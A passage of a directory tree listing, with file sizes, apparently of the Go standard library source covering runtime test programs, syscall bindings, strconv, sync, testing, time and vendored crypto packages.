│ │ │ ├── [ 552] sys_x86.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [4.0K] testfaketime
│ │ │ │ │ └── [ 732] faketime.go
│ │ │ │ ├── [4.0K] testprog
│ │ │ │ │ ├── [ 449] abort.go
│ │ │ │ │ ├── [1.2K] badtraceback.go
│ │ │ │ │ ├── [2.2K] checkptr.go
│ │ │ │ │ ├── [ 917] crashdump.go
│ │ │ │ │ ├── [2.5K] crash.go
│ │ │ │ │ ├── [6.5K] deadlock.go
│ │ │ │ │ ├── [8.6K] gc.go
│ │ │ │ │ ├── [6.5K] lockosthread.go
│ │ │ │ │ ├── [ 651] main.go
│ │ │ │ │ ├── [1.3K] map.go
│ │ │ │ │ ├── [ 869] memprof.go
│ │ │ │ │ ├── [ 306] misc.go
│ │ │ │ │ ├── [3.4K] numcpu_freebsd.go
│ │ │ │ │ ├── [2.2K] panicprint.go
│ │ │ │ │ ├── [ 414] panicrace.go
│ │ │ │ │ ├── [1.6K] preempt.go
│ │ │ │ │ ├── [ 861] signal.go
│ │ │ │ │ ├── [ 378] sleep.go
│ │ │ │ │ ├── [ 443] stringconcat.go
│ │ │ │ │ ├── [ 256] syscalls.go
│ │ │ │ │ ├── [1.3K] syscalls_linux.go
│ │ │ │ │ ├── [ 455] syscalls_none.go
│ │ │ │ │ ├── [1.4K] syscall_windows.go
│ │ │ │ │ ├── [ 813] timeprof.go
│ │ │ │ │ ├── [2.1K] traceback_ancestors.go
│ │ │ │ │ └── [1004] vdso.go
│ │ │ │ ├── [4.0K] testprogcgo
│ │ │ │ │ ├── [ 217] aprof_c.c
│ │ │ │ │ ├── [1.1K] aprof.go
│ │ │ │ │ ├── [ 379] bigstack1_windows.c
│ │ │ │ │ ├── [1.2K] bigstack_windows.c
│ │ │ │ │ ├── [ 586] bigstack_windows.go
│ │ │ │ │ ├── [1.4K] callback.go
│ │ │ │ │ ├── [ 993] catchpanic.go
│ │ │ │ │ ├── [1.8K] cgo.go
│ │ │ │ │ ├── [ 743] crash.go
│ │ │ │ │ ├── [ 509] deadlock.go
│ │ │ │ │ ├── [ 459] dll_windows.go
│ │ │ │ │ ├── [1.1K] dropm.go
│ │ │ │ │ ├── [ 336] dropm_stub.go
│ │ │ │ │ ├── [5.2K] eintr.go
│ │ │ │ │ ├── [2.1K] exec.go
│ │ │ │ │ ├── [ 700] gprof_c.c
│ │ │ │ │ ├── [ 868] gprof.go
│ │ │ │ │ ├── [ 301] lockosthread.c
│ │ │ │ │ ├── [2.6K] lockosthread.go
│ │ │ │ │ ├── [ 651] main.go
│ │ │ │ │ ├── [1.8K] needmdeadlock.go
│ │ │ │ │ ├── [1.9K] numgoroutine.go
│ │ │ │ │ ├── [ 239] panic.c
│ │ │ │ │ ├── [ 312] panic.go
│ │ │ │ │ ├── [1.8K] pprof_callback.go
│ │ │ │ │ ├── [1.7K] pprof.go
│ │ │ │ │ ├── [1.7K] raceprof.go
│ │ │ │ │ ├── [1.9K] racesig.go
│ │ │ │ │ ├── [ 839] segv.go
│ │ │ │ │ ├── [ 484] sigpanic.go
│ │ │ │ │ ├── [2.1K] sigstack.go
│ │ │ │ │ ├── [ 312] sigthrow.go
│ │ │ │ │ ├── [ 987] stack_windows.go
│ │ │ │ │ ├── [ 428] threadpanic.go
│ │ │ │ │ ├── [ 435] threadpanic_unix.c
│ │ │ │ │ ├── [ 435] threadpanic_windows.c
│ │ │ │ │ ├── [2.5K] threadpprof.go
│ │ │ │ │ ├── [2.3K] threadprof.go
│ │ │ │ │ ├── [1.2K] traceback_c.c
│ │ │ │ │ ├── [2.3K] tracebackctxt_c.c
│ │ │ │ │ ├── [2.8K] tracebackctxt.go
│ │ │ │ │ ├── [ 949] traceback.go
│ │ │ │ │ └── [4.0K] windows
│ │ │ │ │ └── [ 169] win.go
│ │ │ │ ├── [4.0K] testprognet
│ │ │ │ │ ├── [ 651] main.go
│ │ │ │ │ ├── [ 539] net.go
│ │ │ │ │ ├── [1.3K] signalexec.go
│ │ │ │ │ └── [ 646] signal.go
│ │ │ │ ├── [4.0K] testwinlib
│ │ │ │ │ ├── [1.8K] main.c
│ │ │ │ │ └── [ 919] main.go
│ │ │ │ ├── [4.0K] testwinlibsignal
│ │ │ │ │ ├── [ 127] dummy.go
│ │ │ │ │ └── [1.5K] main.c
│ │ │ │ └── [4.0K] testwinsignal
│ │ │ │ └── [1.3K] main.go
│ │ │ ├── [1.5K] textflag.h
│ │ │ ├── [ 418] timeasm.go
│ │ │ ├── [2.5K] time_fake.go
│ │ │ ├── [ 31K] time.go
│ │ │ ├── [2.0K] time_linux_amd64.s
│ │ │ ├── [ 709] time_nofake.go
│ │ │ ├── [ 314] timestub2.go
│ │ │ ├── [ 532] timestub.go
│ │ │ ├── [1.8K] time_windows_386.s
│ │ │ ├── [ 871] time_windows_amd64.s
│ │ │ ├── [1021] time_windows_arm64.s
│ │ │ ├── [2.1K] time_windows_arm.s
│ │ │ ├── [ 753] time_windows.h
│ │ │ ├── [1.1K] tls_arm64.h
│ │ │ ├── [1.2K] tls_arm64.s
│ │ │ ├── [3.3K] tls_arm.s
│ │ │ ├── [ 733] tls_mips64x.s
│ │ │ ├── [ 709] tls_mipsx.s
│ │ │ ├── [1.5K] tls_ppc64x.s
│ │ │ ├── [ 726] tls_riscv64.s
│ │ │ ├── [1.5K] tls_s390x.s
│ │ │ ├── [ 260] tls_stub.go
│ │ │ ├── [ 294] tls_windows_amd64.go
│ │ │ ├── [4.0K] trace
│ │ │ │ ├── [6.2K] annotation.go
│ │ │ │ └── [5.0K] trace.go
│ │ │ ├── [ 47K] traceback.go
│ │ │ ├── [ 39K] trace.go
│ │ │ ├── [ 17K] type.go
│ │ │ ├── [ 742] typekind.go
│ │ │ ├── [3.4K] utf8.go
│ │ │ ├── [2.8K] vdso_elf32.go
│ │ │ ├── [2.8K] vdso_elf64.go
│ │ │ ├── [ 443] vdso_freebsd_arm64.go
│ │ │ ├── [ 454] vdso_freebsd_arm.go
│ │ │ ├── [2.4K] vdso_freebsd.go
│ │ │ ├── [1.9K] vdso_freebsd_x86.go
│ │ │ ├── [ 421] vdso_in_none.go
│ │ │ ├── [ 669] vdso_linux_386.go
│ │ │ ├── [ 685] vdso_linux_amd64.go
│ │ │ ├── [ 670] vdso_linux_arm64.go
│ │ │ ├── [ 669] vdso_linux_arm.go
│ │ │ ├── [7.7K] vdso_linux.go
│ │ │ ├── [ 850] vdso_linux_mips64x.go
│ │ │ ├── [ 672] vdso_linux_ppc64x.go
│ │ │ ├── [ 666] vdso_linux_riscv64.go
│ │ │ ├── [2.0K] vlop_386.s
│ │ │ ├── [7.1K] vlop_arm.s
│ │ │ ├── [6.7K] vlrt.go
│ │ │ ├── [3.5K] wincallback.go
│ │ │ ├── [4.6K] write_err_android.go
│ │ │ ├── [ 291] write_err.go
│ │ │ ├── [ 89K] zcallback_windows_arm64.s
│ │ │ ├── [ 89K] zcallback_windows_arm.s
│ │ │ ├── [ 155] zcallback_windows.go
│ │ │ └── [ 63K] zcallback_windows.s
│ │ ├── [4.0K] sort
│ │ │ ├── [ 19K] gen_sort_variants.go
│ │ │ ├── [5.7K] search.go
│ │ │ ├── [1.4K] slice.go
│ │ │ ├── [ 323] slice_go113.go
│ │ │ ├── [ 478] slice_go14.go
│ │ │ ├── [ 319] slice_go18.go
│ │ │ ├── [9.4K] sort.go
│ │ │ ├── [ 11K] zsortfunc.go
│ │ │ └── [ 11K] zsortinterface.go
│ │ ├── [4.0K] strconv
│ │ │ ├── [ 974] atob.go
│ │ │ ├── [3.0K] atoc.go
│ │ │ ├── [ 16K] atof.go
│ │ │ ├── [7.6K] atoi.go
│ │ │ ├── [ 430] bytealg_bootstrap.go
│ │ │ ├── [ 419] bytealg.go
│ │ │ ├── [1.0K] ctoa.go
│ │ │ ├── [ 11K] decimal.go
│ │ │ ├── [1.9K] doc.go
│ │ │ ├── [ 41K] eisel_lemire.go
│ │ │ ├── [ 14K] ftoa.go
│ │ │ ├── [ 16K] ftoaryu.go
│ │ │ ├── [ 11K] isprint.go
│ │ │ ├── [5.3K] itoa.go
│ │ │ ├── [4.8K] makeisprint.go
│ │ │ ├── [ 17K] quote.go
│ │ │ └── [4.0K] testdata
│ │ │ └── [7.9K] testfp.txt
│ │ ├── [4.0K] strings
│ │ │ ├── [3.5K] builder.go
│ │ │ ├── [ 877] clone.go
│ │ │ ├── [1.1K] compare.go
│ │ │ ├── [3.9K] reader.go
│ │ │ ├── [ 14K] replace.go
│ │ │ ├── [4.2K] search.go
│ │ │ └── [ 29K] strings.go
│ │ ├── [4.0K] sync
│ │ │ ├── [4.0K] atomic
│ │ │ │ ├── [2.2K] asm.s
│ │ │ │ ├── [5.4K] doc.go
│ │ │ │ ├── [ 294] race.s
│ │ │ │ └── [5.8K] value.go
│ │ │ ├── [2.5K] cond.go
│ │ │ ├── [ 11K] map.go
│ │ │ ├── [7.9K] mutex.go
│ │ │ ├── [2.3K] once.go
│ │ │ ├── [8.5K] pool.go
│ │ │ ├── [8.8K] poolqueue.go
│ │ │ ├── [ 465] runtime2.go
│ │ │ ├── [ 546] runtime2_lockrank.go
│ │ │ ├── [2.0K] runtime.go
│ │ │ ├── [6.2K] rwmutex.go
│ │ │ └── [4.7K] waitgroup.go
│ │ ├── [ 20K] syscall
│ │ │ ├── [ 342] asan0.go
│ │ │ ├── [ 410] asan.go
│ │ │ ├── [1.2K] asm9_unix2_amd64.s
│ │ │ ├── [ 540] asm_aix_ppc64.s
│ │ │ ├── [2.9K] asm_darwin_amd64.s
│ │ │ ├── [2.8K] asm_darwin_arm64.s
│ │ │ ├── [2.8K] asm_freebsd_arm64.s
│ │ │ ├── [3.0K] asm_freebsd_arm.s
│ │ │ ├── [5.1K] asm_linux_386.s
│ │ │ ├── [3.4K] asm_linux_amd64.s
│ │ │ ├── [2.8K] asm_linux_arm64.s
│ │ │ ├── [4.0K] asm_linux_arm.s
│ │ │ ├── [2.7K] asm_linux_mips64x.s
│ │ │ ├── [3.6K] asm_linux_mipsx.s
│ │ │ ├── [2.7K] asm_linux_ppc64x.s
│ │ │ ├── [2.9K] asm_linux_riscv64.s
│ │ │ ├── [4.2K] asm_linux_s390x.s
│ │ │ ├── [1.0K] asm_netbsd_amd64.s
│ │ │ ├── [2.9K] asm_netbsd_arm64.s
│ │ │ ├── [2.8K] asm_netbsd_arm.s
│ │ │ ├── [1.0K] asm_openbsd_386.s
│ │ │ ├── [1.0K] asm_openbsd_amd64.s
│ │ │ ├── [1.0K] asm_openbsd_arm64.s
│ │ │ ├── [1.0K] asm_openbsd_arm.s
│ │ │ ├── [2.8K] asm_openbsd_mips64.s
│ │ │ ├── [3.1K] asm_plan9_386.s
│ │ │ ├── [3.4K] asm_plan9_amd64.s
│ │ │ ├── [3.2K] asm_plan9_arm.s
│ │ │ ├── [1.7K] asm_solaris_amd64.s
│ │ │ ├── [2.7K] asm_unix_386.s
│ │ │ ├── [2.2K] asm_unix_amd64.s
│ │ │ ├── [4.6K] bpf_bsd.go
│ │ │ ├── [4.0K] bpf_darwin.go
│ │ │ ├── [1.2K] const_plan9.go
│ │ │ ├── [3.0K] dirent.go
│ │ │ ├── [5.6K] dir_plan9.go
│ │ │ ├── [8.2K] dll_windows.go
│ │ │ ├── [ 249] endian_big.go
│ │ │ ├── [ 298] endian_little.go
│ │ │ ├── [2.8K] env_unix.go
│ │ │ ├── [1.8K] env_windows.go
│ │ │ ├── [1.6K] errors_plan9.go
│ │ │ ├── [7.4K] exec_bsd.go
│ │ │ ├── [7.8K] exec_freebsd.go
│ │ │ ├── [7.9K] exec_libc2.go
│ │ │ ├── [7.7K] exec_libc.go
│ │ │ ├── [ 18K] exec_linux.go
│ │ │ ├── [ 13K] exec_plan9.go
│ │ │ ├── [8.7K] exec_unix.go
│ │ │ ├── [ 11K] exec_windows.go
│ │ │ ├── [ 564] flock_aix.go
│ │ │ ├── [ 405] flock_darwin.go
│ │ │ ├── [ 704] flock.go
│ │ │ ├── [ 511] flock_linux_32bit.go
│ │ │ ├── [ 307] forkpipe2.go
│ │ │ ├── [ 487] forkpipe.go
│ │ │ ├── [ 11K] fs_js.go
│ │ │ ├── [4.0K] js
│ │ │ │ ├── [2.6K] func.go
│ │ │ │ ├── [ 15K] js.go
│ │ │ │ └── [1.1K] js_js.s
│ │ │ ├── [2.1K] lsf_linux.go
│ │ │ ├── [ 13K] mkall.sh
│ │ │ ├── [1.7K] mkasm.go
│ │ │ ├── [ 11K] mkerrors.sh
│ │ │ ├── [2.0K] mkpost.go
│ │ │ ├── [8.0K] mksyscall_libc.pl
│ │ │ ├── [9.9K] mksyscall.pl
│ │ │ ├── [2.0K] mksyscall_windows.go
│ │ │ ├── [5.0K] mksysctl_openbsd.pl
│ │ │ ├── [ 866] mksysnum_dragonfly.pl
│ │ │ ├── [1.3K] mksysnum_freebsd.pl
│ │ │ ├── [1.3K] mksysnum_linux.pl
│ │ │ ├── [1.0K] mksysnum_netbsd.pl
│ │ │ ├── [ 872] mksysnum_openbsd.pl
│ │ │ ├── [ 459] mksysnum_plan9.sh
│ │ │ ├── [ 342] msan0.go
│ │ │ ├── [ 410] msan.go
│ │ │ ├── [1.2K] net.go
│ │ │ ├── [2.1K] net_js.go
│ │ │ ├── [4.6K] netlink_linux.go
│ │ │ ├── [ 381] ptrace_darwin.go
│ │ │ ├── [ 368] ptrace_ios.go
│ │ │ ├── [1.6K] pwd_plan9.go
│ │ │ ├── [9.1K] route_bsd.go
│ │ │ ├── [2.0K] route_darwin.go
│ │ │ ├── [2.6K] route_dragonfly.go
│ │ │ ├── [1.3K] route_freebsd_32bit.go
│ │ │ ├── [ 738] route_freebsd_64bit.go
│ │ │ ├── [2.7K] route_freebsd.go
│ │ │ ├── [1.4K] route_netbsd.go
│ │ │ ├── [1.5K] route_openbsd.go
│ │ │ ├── [ 10K] security_windows.go
│ │ │ ├── [ 435] setuidgid_32_linux.go
│ │ │ ├── [ 421] setuidgid_linux.go
│ │ │ ├── [ 632] sock_cloexec_linux.go
│ │ │ ├── [ 547] sockcmsg_dragonfly.go
│ │ │ ├── [1.1K] sockcmsg_linux.go
│ │ │ ├── [2.5K] sockcmsg_unix.go
│ │ │ ├── [1.1K] sockcmsg_unix_other.go
│ │ │ ├── [ 18K] syscall_aix.go
│ │ │ ├── [ 405] syscall_aix_ppc64.go
│ │ │ ├── [ 14K] syscall_bsd.go
│ │ │ ├── [1.9K] syscall_darwin_amd64.go
│ │ │ ├── [1.8K] syscall_darwin_arm64.go
│ │ │ ├── [ 11K] syscall_darwin.go
│ │ │ ├── [1.1K] syscall_dragonfly_amd64.go
│ │ │ ├── [8.3K] syscall_dragonfly.go
│ │ │ ├── [1.2K] syscall_freebsd_386.go
│ │ │ ├── [1.1K] syscall_freebsd_amd64.go
│ │ │ ├── [1.1K] syscall_freebsd_arm64.go
│ │ │ ├── [1.2K] syscall_freebsd_arm.go
│ │ │ ├── [ 16K] syscall_freebsd.go
│ │ │ ├── [3.6K] syscall.go
│ │ │ ├── [1.2K] syscall_illumos.go
│ │ │ ├── [6.6K] syscall_js.go
│ │ │ ├── [9.7K] syscall_linux_386.go
│ │ │ ├── [4.6K] syscall_linux_amd64.go
│ │ │ ├── [5.9K] syscall_linux_arm64.go
│ │ │ ├── [6.5K] syscall_linux_arm.go
│ │ │ ├── [ 31K] syscall_linux.go
│ │ │ ├── [5.8K] syscall_linux_mips64x.go
│ │ │ ├── [6.3K] syscall_linux_mipsx.go
│ │ │ ├── [4.5K] syscall_linux_ppc64x.go
│ │ │ ├── [5.6K] syscall_linux_riscv64.go
│ │ │ ├── [7.7K] syscall_linux_s390x.go
│ │ │ ├── [ 716] syscall_netbsd_386.go
│ │ │ ├── [ 709] syscall_netbsd_amd64.go
│ │ │ ├── [ 709] syscall_netbsd_arm64.go
│ │ │ ├── [ 716] syscall_netbsd_arm.go
│ │ │ ├── [7.5K] syscall_netbsd.go
│ │ │ ├── [ 609] syscall_openbsd1.go
│ │ │ ├── [ 715] syscall_openbsd_386.go
│ │ │ ├── [ 701] syscall_openbsd_amd64.go
│ │ │ ├── [ 906] syscall_openbsd_arm64.go
│ │ │ ├── [ 715] syscall_openbsd_arm.go
│ │ │ ├── [6.6K] syscall_openbsd.go
│ │ │ ├── [3.5K] syscall_openbsd_libc.go
│ │ │ ├── [ 934] syscall_openbsd_mips64.go
│ │ │ ├── [9.0K] syscall_plan9.go
│ │ │ ├── [ 487] syscall_solaris_amd64.go
│ │ │ ├── [ 15K] syscall_solaris.go
│ │ │ ├── [ 12K] syscall_unix.go
│ │ │ ├── [ 49K] syscall_windows.go
│ │ │ ├── [ 19K] tables_js.go
│ │ │ ├── [ 677] time_fake.go
│ │ │ ├── [ 351] time_nofake.go
│ │ │ ├── [ 944] timestruct.go
│ │ │ ├── [3.4K] types_aix.go
│ │ │ ├── [5.0K] types_darwin.go
│ │ │ ├── [5.0K] types_dragonfly.go
│ │ │ ├── [7.0K] types_freebsd.go
│ │ │ ├── [ 379] types_illumos_amd64.go
│ │ │ ├── [ 11K] types_linux.go
│ │ │ ├── [4.8K] types_netbsd.go
│ │ │ ├── [5.0K] types_openbsd.go
│ │ │ ├── [4.9K] types_solaris.go
│ │ │ ├── [ 477] types_windows_386.go
│ │ │ ├── [ 477] types_windows_amd64.go
│ │ │ ├── [ 477] types_windows_arm64.go
│ │ │ ├── [ 477] types_windows_arm.go
│ │ │ ├── [ 28K] types_windows.go
│ │ │ ├── [ 47K] zerrors_aix_ppc64.go
│ │ │ ├── [ 55K] zerrors_darwin_amd64.go
│ │ │ ├── [ 56K] zerrors_darwin_arm64.go
│ │ │ ├── [ 60K] zerrors_dragonfly_amd64.go
│ │ │ ├── [ 67K] zerrors_freebsd_386.go
│ │ │ ├── [ 67K] zerrors_freebsd_amd64.go
│ │ │ ├── [ 67K] zerrors_freebsd_arm64.go
│ │ │ ├── [ 67K] zerrors_freebsd_arm.go
│ │ │ ├── [ 58K] zerrors_linux_386.go
│ │ │ ├── [ 58K] zerrors_linux_amd64.go
│ │ │ ├── [ 70K] zerrors_linux_arm64.go
│ │ │ ├── [ 59K] zerrors_linux_arm.go
│ │ │ ├── [ 69K] zerrors_linux_mips64.go
│ │ │ ├── [ 69K] zerrors_linux_mips64le.go
│ │ │ ├── [ 70K] zerrors_linux_mips.go
│ │ │ ├── [ 70K] zerrors_linux_mipsle.go
│ │ │ ├── [ 72K] zerrors_linux_ppc64.go
│ │ │ ├── [ 73K] zerrors_linux_ppc64le.go
│ │ │ ├── [ 72K] zerrors_linux_riscv64.go
│ │ │ ├── [ 74K] zerrors_linux_s390x.go
│ │ │ ├── [ 67K] zerrors_netbsd_386.go
│ │ │ ├── [ 67K] zerrors_netbsd_amd64.go
│ │ │ ├── [ 67K] zerrors_netbsd_arm64.go
│ │ │ ├── [ 66K] zerrors_netbsd_arm.go
│ │ │ ├── [ 63K] zerrors_openbsd_386.go
│ │ │ ├── [ 62K] zerrors_openbsd_amd64.go
│ │ │ ├── [ 66K] zerrors_openbsd_arm64.go
│ │ │ ├── [ 62K] zerrors_openbsd_arm.go
│ │ │ ├── [ 67K] zerrors_openbsd_mips64.go
│ │ │ ├── [ 51K] zerrors_solaris_amd64.go
│ │ │ ├── [10.0K] zerrors_windows.go
│ │ │ ├── [ 41K] zsyscall_aix_ppc64.go
│ │ │ ├── [ 51K] zsyscall_darwin_amd64.go
│ │ │ ├── [8.6K] zsyscall_darwin_amd64.s
│ │ │ ├── [ 51K] zsyscall_darwin_arm64.go
│ │ │ ├── [8.6K] zsyscall_darwin_arm64.s
│ │ │ ├── [ 31K] zsyscall_dragonfly_amd64.go
│ │ │ ├── [ 34K] zsyscall_freebsd_386.go
│ │ │ ├── [ 33K] zsyscall_freebsd_amd64.go
│ │ │ ├── [ 33K] zsyscall_freebsd_arm64.go
│ │ │ ├── [ 34K] zsyscall_freebsd_arm.go
│ │ │ ├── [ 34K] zsyscall_linux_386.go
│ │ │ ├── [ 39K] zsyscall_linux_amd64.go
│ │ │ ├── [ 37K] zsyscall_linux_arm64.go
│ │ │ ├── [ 38K] zsyscall_linux_arm.go
│ │ │ ├── [ 40K] zsyscall_linux_mips64.go
│ │ │ ├── [ 40K] zsyscall_linux_mips64le.go
│ │ │ ├── [ 40K] zsyscall_linux_mips.go
│ │ │ ├── [ 40K] zsyscall_linux_mipsle.go
│ │ │ ├── [ 40K] zsyscall_linux_ppc64.go
│ │ │ ├── [ 40K] zsyscall_linux_ppc64le.go
│ │ │ ├── [ 37K] zsyscall_linux_riscv64.go
│ │ │ ├── [ 35K] zsyscall_linux_s390x.go
│ │ │ ├── [ 30K] zsyscall_netbsd_386.go
│ │ │ ├── [ 29K] zsyscall_netbsd_amd64.go
│ │ │ ├── [ 29K] zsyscall_netbsd_arm64.go
│ │ │ ├── [ 30K] zsyscall_netbsd_arm.go
│ │ │ ├── [ 47K] zsyscall_openbsd_386.go
│ │ │ ├── [8.0K] zsyscall_openbsd_386.s
│ │ │ ├── [ 47K] zsyscall_openbsd_amd64.go
│ │ │ ├── [8.0K] zsyscall_openbsd_amd64.s
│ │ │ ├── [ 47K] zsyscall_openbsd_arm64.go
│ │ │ ├── [8.0K] zsyscall_openbsd_arm64.s
│ │ │ ├── [ 47K] zsyscall_openbsd_arm.go
│ │ │ ├── [8.0K] zsyscall_openbsd_arm.s
│ │ │ ├── [ 30K] zsyscall_openbsd_mips64.go
│ │ │ ├── [6.2K] zsyscall_plan9_386.go
│ │ │ ├── [6.2K] zsyscall_plan9_amd64.go
│ │ │ ├── [6.2K] zsyscall_plan9_arm.go
│ │ │ ├── [ 37K] zsyscall_solaris_amd64.go
│ │ │ ├── [ 57K] zsyscall_windows.go
│ │ │ ├── [ 12K] zsysctl_openbsd.go
│ │ │ ├── [ 15K] zsysnum_darwin_amd64.go
│ │ │ ├── [ 14K] zsysnum_darwin_arm64.go
│ │ │ ├── [ 23K] zsysnum_dragonfly_amd64.go
│ │ │ ├── [ 26K] zsysnum_freebsd_386.go
│ │ │ ├── [ 26K] zsysnum_freebsd_amd64.go
│ │ │ ├── [ 36K] zsysnum_freebsd_arm64.go
│ │ │ ├── [ 26K] zsysnum_freebsd_arm.go
│ │ │ ├── [ 11K] zsysnum_linux_386.go
│ │ │ ├── [ 10K] zsysnum_linux_amd64.go
│ │ │ ├── [8.9K] zsysnum_linux_arm64.go
│ │ │ ├── [ 12K] zsysnum_linux_arm.go
│ │ │ ├── [ 11K] zsysnum_linux_mips64.go
│ │ │ ├── [ 11K] zsysnum_linux_mips64le.go
│ │ │ ├── [ 12K] zsysnum_linux_mips.go
│ │ │ ├── [ 12K] zsysnum_linux_mipsle.go
│ │ │ ├── [ 11K] zsysnum_linux_ppc64.go
│ │ │ ├── [ 11K] zsysnum_linux_ppc64le.go
│ │ │ ├── [8.9K] zsysnum_linux_riscv64.go
│ │ │ ├── [ 11K] zsysnum_linux_s390x.go
│ │ │ ├── [ 26K] zsysnum_netbsd_386.go
│ │ │ ├── [ 26K] zsysnum_netbsd_amd64.go
│ │ │ ├── [ 26K] zsysnum_netbsd_arm64.go
│ │ │ ├── [ 26K] zsysnum_netbsd_arm.go
│ │ │ ├── [ 14K] zsysnum_openbsd_386.go
│ │ │ ├── [ 14K] zsysnum_openbsd_amd64.go
│ │ │ ├── [ 15K] zsysnum_openbsd_arm64.go
│ │ │ ├── [ 14K] zsysnum_openbsd_arm.go
│ │ │ ├── [ 15K] zsysnum_openbsd_mips64.go
│ │ │ ├── [1.0K] zsysnum_plan9.go
│ │ │ ├── [ 293] zsysnum_solaris_amd64.go
│ │ │ ├── [4.2K] ztypes_aix_ppc64.go
│ │ │ ├── [6.9K] ztypes_darwin_amd64.go
│ │ │ ├── [6.9K] ztypes_darwin_arm64.go
│ │ │ ├── [6.7K] ztypes_dragonfly_amd64.go
│ │ │ ├── [9.0K] ztypes_freebsd_386.go
│ │ │ ├── [9.0K] ztypes_freebsd_amd64.go
│ │ │ ├── [9.0K] ztypes_freebsd_arm64.go
│ │ │ ├── [9.0K] ztypes_freebsd_arm.go
│ │ │ ├── [ 12K] ztypes_linux_386.go
│ │ │ ├── [ 12K] ztypes_linux_amd64.go
│ │ │ ├── [ 10K] ztypes_linux_arm64.go
│ │ │ ├── [ 11K] ztypes_linux_arm.go
│ │ │ ├── [ 10K] ztypes_linux_mips64.go
│ │ │ ├── [ 10K] ztypes_linux_mips64le.go
│ │ │ ├── [9.9K] ztypes_linux_mips.go
│ │ │ ├── [9.9K] ztypes_linux_mipsle.go
│ │ │ ├── [ 10K] ztypes_linux_ppc64.go
│ │ │ ├── [ 10K] ztypes_linux_ppc64le.go
│ │ │ ├── [ 10K] ztypes_linux_riscv64.go
│ │ │ ├── [ 10K] ztypes_linux_s390x.go
│ │ │ ├── [6.0K] ztypes_netbsd_386.go
│ │ │ ├── [6.2K] ztypes_netbsd_amd64.go
│ │ │ ├── [6.2K] ztypes_netbsd_arm64.go
│ │ │ ├── [6.1K] ztypes_netbsd_arm.go
│ │ │ ├── [6.7K] ztypes_openbsd_386.go
│ │ │ ├── [6.9K] ztypes_openbsd_amd64.go
│ │ │ ├── [6.7K] ztypes_openbsd_arm64.go
│ │ │ ├── [6.8K] ztypes_openbsd_arm.go
│ │ │ ├── [6.7K] ztypes_openbsd_mips64.go
│ │ │ └── [5.6K] ztypes_solaris_amd64.go
│ │ ├── [4.0K] testdata
│ │ │ └── [554K] Isaac.Newton-Opticks.txt
│ │ ├── [4.0K] testing
│ │ │ ├── [1.4K] allocs.go
│ │ │ ├── [ 23K] benchmark.go
│ │ │ ├── [3.3K] cover.go
│ │ │ ├── [2.7K] example.go
│ │ │ ├── [4.0K] fstest
│ │ │ │ ├── [7.0K] mapfs.go
│ │ │ │ └── [ 16K] testfs.go
│ │ │ ├── [ 22K] fuzz.go
│ │ │ ├── [4.0K] internal
│ │ │ │ └── [4.0K] testdeps
│ │ │ │ └── [4.9K] deps.go
│ │ │ ├── [4.0K] iotest
│ │ │ │ ├── [1.3K] logger.go
│ │ │ │ ├── [7.9K] reader.go
│ │ │ │ └── [ 674] writer.go
│ │ │ ├── [7.0K] match.go
│ │ │ ├── [4.0K] quick
│ │ │ │ └── [ 10K] quick.go
│ │ │ ├── [1.3K] run_example.go
│ │ │ ├── [1.7K] run_example_js.go
│ │ │ ├── [ 65K] testing.go
│ │ │ ├── [ 386] testing_other.go
│ │ │ └── [ 751] testing_windows.go
│ │ ├── [4.0K] text
│ │ │ ├── [4.0K] scanner
│ │ │ │ └── [ 20K] scanner.go
│ │ │ ├── [4.0K] tabwriter
│ │ │ │ └── [ 18K] tabwriter.go
│ │ │ └── [4.0K] template
│ │ │ ├── [ 18K] doc.go
│ │ │ ├── [ 31K] exec.go
│ │ │ ├── [ 21K] funcs.go
│ │ │ ├── [6.3K] helper.go
│ │ │ ├── [1.9K] option.go
│ │ │ ├── [4.0K] parse
│ │ │ │ ├── [ 18K] lex.go
│ │ │ │ ├── [ 24K] node.go
│ │ │ │ └── [ 21K] parse.go
│ │ │ ├── [7.2K] template.go
│ │ │ └── [4.0K] testdata
│ │ │ ├── [ 57] file1.tmpl
│ │ │ ├── [ 76] file2.tmpl
│ │ │ ├── [ 50] tmpl1.tmpl
│ │ │ └── [ 50] tmpl2.tmpl
│ │ ├── [4.0K] time
│ │ │ ├── [ 304] embed.go
│ │ │ ├── [ 46K] format.go
│ │ │ ├── [3.0K] genzabbrs.go
│ │ │ ├── [5.6K] sleep.go
│ │ │ ├── [1016] sys_plan9.go
│ │ │ ├── [1.0K] sys_unix.go
│ │ │ ├── [ 996] sys_windows.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 705] 2020b_Europe_Berlin
│ │ │ │ ├── [ 465] 2021a_America_Nuuk
│ │ │ │ ├── [1.2K] 2021a_Asia_Gaza
│ │ │ │ └── [1.5K] 2021a_Europe_Dublin
│ │ │ ├── [2.3K] tick.go
│ │ │ ├── [ 47K] time.go
│ │ │ ├── [4.0K] tzdata
│ │ │ │ ├── [1.9K] generate_zipdata.go
│ │ │ │ ├── [2.9K] tzdata.go
│ │ │ │ └── [1.3M] zipdata.go
│ │ │ ├── [ 10K] zoneinfo_abbrs_windows.go
│ │ │ ├── [2.2K] zoneinfo_android.go
│ │ │ ├── [ 17K] zoneinfo.go
│ │ │ ├── [ 348] zoneinfo_goroot.go
│ │ │ ├── [1.0K] zoneinfo_ios.go
│ │ │ ├── [1.5K] zoneinfo_js.go
│ │ │ ├── [2.7K] zoneinfo_plan9.go
│ │ │ ├── [ 14K] zoneinfo_read.go
│ │ │ ├── [1.6K] zoneinfo_unix.go
│ │ │ └── [6.7K] zoneinfo_windows.go
│ │ ├── [4.0K] unicode
│ │ │ ├── [ 755] casetables.go
│ │ │ ├── [ 352] digit.go
│ │ │ ├── [4.4K] graphic.go
│ │ │ ├── [9.9K] letter.go
│ │ │ ├── [197K] tables.go
│ │ │ ├── [4.0K] utf16
│ │ │ │ └── [2.8K] utf16.go
│ │ │ └── [4.0K] utf8
│ │ │ └── [ 16K] utf8.go
│ │ ├── [4.0K] unsafe
│ │ │ └── [ 10K] unsafe.go
│ │ └── [4.0K] vendor
│ │ ├── [4.0K] golang.org
│ │ │ └── [4.0K] x
│ │ │ ├── [4.0K] crypto
│ │ │ │ ├── [ 174] AUTHORS
│ │ │ │ ├── [4.0K] chacha20
│ │ │ │ │ ├── [ 479] chacha_arm64.go
│ │ │ │ │ ├── [8.0K] chacha_arm64.s
│ │ │ │ │ ├── [ 14K] chacha_generic.go
│ │ │ │ │ ├── [ 441] chacha_noasm.go
│ │ │ │ │ ├── [ 468] chacha_ppc64le.go
│ │ │ │ │ ├── [9.1K] chacha_ppc64le.s
